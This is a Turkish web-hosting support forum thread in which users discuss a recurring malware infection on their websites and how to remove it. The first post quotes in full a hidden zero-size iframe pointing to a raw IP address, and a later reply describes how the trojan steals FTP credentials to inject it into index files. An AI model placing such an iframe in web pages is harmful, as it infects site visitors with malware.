| |||||||
| Kayıt ol | Yardım | Üye Listesi | Ajanda | Forumları Okundu Kabul Et |
![]() |
| | LinkBack | Seçenekler | Stil |
| |||
| virus uyarisi Kod: <iframe src='http://81.95.149.27/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCOLLING=no></iframe> sitelere böyle bir iframe veriyor bunu ben siliyorum ama gene geri gelyior çekilmiş bir resminnide göstereyim hocam. www.volkandesign.com/virus.jpg bunun sorunu ne olabilir? |
| |||
| yahu bundna hala kurtulamadim dostum tüm sitelerde çıkıyor ![]() |
| ||||
| clamAV kurup tarama yaptınız mı??
__________________ WHMSONIC TÜRKİYE YETKİLİSİ WEB PROGRAMCILARI VE TASARIMCILAR ARANIYOR! ----------------------------------------------------------------------------------------- >> LÜTFEN ÜCRETSİZ DESTEK TALEP ETMEK İÇİN MSN ADRESLERİMİZİ EKLEMEYİNİZ. HER TÜRLÜ ÜCRETSİZ DESTEK İÇİN FORUMLARIMIZI KULLANINIZ. TEŞEKKÜRLER << |
| |||
| clamav nereeden kurabilirim? |
| ||||
| forumda aratın o sizi bulur ![]()
__________________ WHMSONIC TÜRKİYE YETKİLİSİ WEB PROGRAMCILARI VE TASARIMCILAR ARANIYOR! ----------------------------------------------------------------------------------------- >> LÜTFEN ÜCRETSİZ DESTEK TALEP ETMEK İÇİN MSN ADRESLERİMİZİ EKLEMEYİNİZ. HER TÜRLÜ ÜCRETSİZ DESTEK İÇİN FORUMLARIMIZI KULLANINIZ. TEŞEKKÜRLER << |
| |||
| Arkadaslar Bu Cpanel 11in açiği olabilirmi acaba? |
| ||||
| tabiki hayır.
__________________ 1.)Lütfen destek talebinde bulunmak için msn messenger üzerinden iletişime geçmeyiniz. 2.)Ücretsiz destek almak için forum sayfalarımızı kullanmanız aynı sorunu yaşayan diğer üyelerin cevaplara en kısa sürede ulaşabilmesi ve sizlere yardımcı olmak isteyen bizlerin ve diğer üyelerimizin zaman kazanmaları açısından çok önemlidir. 3.)Forumlarımızda sorunlarınızı anlatırken mümkün olduğunca çok detay vermeniz en kısa sürede sorununuza çözüm bulmanız açısından mühimdir. Daha çok öğrenmek ve öğretmek dileğiyle.. Sevgiler.. The Platform. |
| |||
| Arkadaşlar clamav la rkhunter ı kurdum clamavla bisey gozukmuyor rkhunter 2 kırmızı yaktı biri port bunlari nasil düzeltebilirm :S bu virus tüm sisteme bulasiyor :S |
| |||
| slm arkadaşlar, bu güzel düşünülmüş ve hazırlanmış trojenin çalışma şeklini anlatmak isterim öncelikle, trojen bu trojeni barındıran daha önce girmiş olduğunuz bir siteden sizin bilgisayarınıza giriş yapmaktadır, ardından ftp kullanılıyorsa bu bilgisayarda bu ftp kullanılarak daha önce bağlanılmmış sitelere bağlanıyor ve index.html , index.php olan tüm dosyaların altına <iframe vs vs tarzında kendi kodlarını ekliyor, trojen bulaşan siteyi ziyaret edenler de aynı trojeni makinelerine indiriyor ve aynı süreç devam ediyor, trojenden kurtulmak ve engellemek için yapılması gereken ip adresinin banlanmasıdır, ancak hatırladığım kadarı ile bu ip den göndermiyor bağlanılmıyor server a ftp ile , bir alt veya bir üst numarası olması gerek bunlarıda banlarsanız sorun çözülmüş olacaktır, syg. |
![]() |
| Seçenekler | |
| Stil | |
| |